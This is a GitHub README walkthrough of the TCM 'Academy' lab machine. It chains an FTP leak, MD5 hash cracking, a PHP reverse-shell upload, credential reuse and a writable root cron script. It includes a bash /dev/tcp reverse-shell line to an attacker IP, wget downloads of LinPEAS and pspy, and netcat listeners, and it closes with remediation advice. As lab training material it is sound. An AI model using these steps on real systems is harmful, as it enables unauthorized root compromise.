Skip to content

WNobsi/TCM-Academy-Machine-Walkthrough

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 

Repository files navigation

Academy - TCM Machine Walkthrough

Platform: TCM
Machine: Academy
Difficulty: Easy
Objective: Gain root access and capture the flag.


Table of Contents


Overview

The Academy machine demonstrates how several seemingly minor security weaknesses can be chained together to achieve complete system compromise.

The attack path involved:

  1. Information disclosure through FTP.
  2. Weak password storage using MD5.
  3. Unrestricted file upload resulting in Remote Code Execution.
  4. Credential reuse.
  5. Insecure cron execution leading to root compromise.

Methodology

Reconnaissance
      ↓
Enumeration
      ↓
Credential Discovery
      ↓
File Upload → RCE
      ↓
Local Enumeration
      ↓
Credential Reuse
      ↓
Cron Abuse
      ↓
Root Access


Reconnaissance

Host Discovery

netdiscover -r 192.168.126.0/24

or

nmap -sn 192.168.126.0/24

Port Discovery & Service Enumeration

nmap -sS -p- -A 192.168.126.131

Findings

  • Port 80 (HTTP)
  • Academy web application

Pentester's Observation

The first objective is to understand the exposed attack surface. A single web application can often provide enough opportunities to fully compromise a system.


Enumeration

Web Enumeration

http://192.168.126.131

Shows the default Apache webpage, meaning there was no redirect to the index.html or landing page. This can be flagged as Information Disclosure and be added to findings as it reveals the server information and version that is in use.

Directory Enumeration

gobuster dir \
-u http://192.168.126.131 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

We find that,

http://192.168.126.131/academy

Leads to a login page,

FTP Information Disclosure

Interesting directories revealed an FTP resource, "note.txt".

We get access to the ftp using: username: anonymous password: anonymous

After retrieving the note.txt through ftp. We make interesting discoveries.

Discovered credentials:

Username: 10201321
Password: cd73502828457d15655bbd7a63fb0bc8

We try to login The password resembles very similar to a hash, so we run it through a hash-identifier.

After identifying it is MD5, we use Hashcat to crack the hash and find that the value is:

student

Leading to the Final credentials:

Username: 10201321
Password: student

Pentester's Observation

Whenever credentials resemble hashes, always attempt identification and cracking before assuming they are plaintext.


Initial Exploitation

Student Portal Login

Username: 10201321
Password: student

First we try with the hash as the password (maybe it might work!)

It gave us an error as invalid.

Next we try the cracked-hash 'student' as the password.

And it worked smoothly.

We see that the "My Profile" has a file upload functionality.


File Upload Functionality

The profile page:

/my_profile.php

suggests that the server is running PHP and allows image uploads.

Pentester's Observation

File upload functionality is one of the highest-value attack vectors during web application testing because weak validation can quickly lead to Remote Code Execution.


Uploading a PHP Reverse Shell

Use:

https://github.com/pentestmonkey/php-reverse-shell

Modify:

$ip = 'ATTACKER-IP';
$port = 1234;

Listener:

nc -lvnp 1234

Upload:

photo.php

And it uploaded successfully.


Obtaining Remote Code Execution

hostname
whoami

Outputs:

academy
www-data

Pentester's Observation

Initial access is only the beginning. The next objective is always privilege escalation.


Privilege Escalation

From the reverse shell, we see that we cannot use

sudo su

to escalate to root user.

Which leads to our next step, escalating our privileges.

Local Enumeration with LinPEAS

So we use a shell script called LinPEAS, which is available in /opt/linpeas/ We copy the linpeas.sh to /home/kali/Academy And start our own http server using python3 in /home/kali/Academy directory.

python3 -m http.server 8000

Now we download the linepeas.sh file into the victim machine using wget. Change the permissions. And execute the linpeas.sh

wget http://192.168.126.128:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

And now we wait for the magic to happen,

We find a lot of interesting information that can help in escalating our privilege.

Lots of passwd files, mysql_passwords, users. We open the /var/www/html/academy/includes/config.php file and check what information we can find in that specific file.

We discovered:

$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";

Pentester's Observation

Configuration files often contain credentials and should always be inspected after gaining shell access.


Credential Reuse

The information we found, can be very useful to escalate our privilege and now remotely access the server and try if the mysql password we found is reused, and if it is, it works in our favour.

ssh grimmie@192.168.126.131

Fantastic! We got access to their server as an administrator only because the user kept the same credentials. That should teach them a lesson.

Pentester's Observation

Credential reuse is one of the most common real-world weaknesses and frequently enables privilege escalation.


Investigating Cron Jobs

We check for what files are there in the home directory using "ls" for grimmie and we find a very interesting piece of file.

A file named:

backup.sh

was found in the user's home directory.

When we check the backup.sh file, it looks like a file running a script to backup the server - by which we can infer that the file is scheduled to be executed by the system - meaning cron jobs are involved.

When we list grimmie's crontab, we see that nothing is listed. Which most probably can mean that the cron is run by another user, which maybe the root user.

To confirm, we use pspy to check if "backup.sh" is really scheduled or not.

PSPY : https://github.com/dominicbreuker/pspy

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.

So we download pspy from github in our attacker machine and copy it into the http server folder we were running. And we use wget to transfer the file to the victim machine.

Using pspy confirmed that the script was executed by root.

Pentester's Observation

Writable scripts executed by root are excellent privilege escalation opportunities.


Cron Exploitation

Confirming that backup.sh is indeed being scheduled to run by cron and not by "grimmie" user. Means it probably is scheduled by root and we can use this information to exploit and get root access.

So we change the script in backup.sh to run the following command and listen in port 8081 using netcat. This is a reverse-shell script which connects to our attacker machine in port 8081.

bash -i >& /dev/tcp/192.168.126.128/8081 0>&1

Start listener:

nc -nvlp 8081

The machine connects back as root.


Flag Capture

whoami
cat /root/flag.txt

Output:

root

Vulnerability Assessment

1. Information Disclosure via FTP

  • Severity: High
  • CVSS v3.1: 7.5

Impact

Unauthorized access to application credentials.

Remediation

  • Remove sensitive files from public locations.
  • Disable anonymous FTP.
  • Restrict access using ACLs.

Priority: P2


2. Weak Password Storage (MD5)

  • Severity: High
  • CVSS v3.1: 7.5
  • CWE-327
  • CWE-759

Remediation

  • Use Argon2id, bcrypt, or scrypt.
  • Implement salting.
  • Enforce strong password policies.

Priority: P2


3. Unrestricted File Upload (RCE)

  • Severity: Critical
  • CVSS v3.1: 9.8
  • CWE-434

Remediation

  • Validate file signatures and MIME types.
  • Store uploads outside the web root.
  • Disable script execution in upload directories.
  • Implement allowlists.

Priority: P1


4. Credential Reuse

  • Severity: High
  • CVSS v3.1: 8.8
  • CWE-798

Remediation

  • Separate application and system credentials.
  • Rotate passwords.
  • Use secrets management.

Priority: P1


5. Plaintext Credentials in Configuration Files

  • Severity: Medium
  • CVSS v3.1: 6.5
  • CWE-256

Remediation

  • Store secrets in environment variables.
  • Restrict file permissions.
  • Use secret management solutions.

Priority: P3


6. Insecure Cron Permissions

  • Severity: Critical
  • CVSS v3.1: 9.8
  • CWE-732

Remediation

chown root:root backup.sh
chmod 700 backup.sh
  • Audit cron jobs regularly.
  • Monitor integrity of privileged scripts.

Priority: P1


Vulnerability Prioritization Matrix

Vulnerability Severity Priority
Unrestricted File Upload Critical P1
Insecure Cron Permissions Critical P1
Credential Reuse High P1
Information Disclosure High P2
Weak Password Storage High P2
Plaintext Credentials Medium P3

Key Takeaways & Lessons Learned

Offensive Lessons

  • Information disclosure can lead to complete compromise.
  • File upload functionality should always be tested.
  • Configuration files frequently expose credentials.
  • Credential reuse remains highly dangerous.
  • Process monitoring tools like pspy are invaluable.

Defensive Lessons

  • Enforce secure password storage.
  • Validate file uploads.
  • Separate credentials.
  • Secure cron jobs.
  • Implement least privilege.

Pentester's Final Observation

The Academy machine perfectly demonstrates the concept of vulnerability chaining.

No single vulnerability directly resulted in root compromise. Instead, several weaknesses combined to create a complete attack path:

Information Disclosure
        ↓
Weak Password Storage
        ↓
Remote Code Execution
        ↓
Credential Reuse
        ↓
Insecure Cron Permissions
        ↓
Root Compromise

Security failures rarely occur because of a single vulnerability. They occur when several weaknesses coexist and amplify one another.

The key question throughout this engagement was:

"What does this new piece of information allow me to do next?"

About

A detailed walkthrough of the Academy (TCM) machine covering the complete penetration testing lifecycle—from reconnaissance and enumeration to exploitation, privilege escalation, and root compromise. Includes methodology, attack chain analysis, vulnerability assessment, mitigations, and key lessons for aspiring pentesters.

Topics

Resources

Stars

0 stars

Watchers

0 watching

Forks

Contributors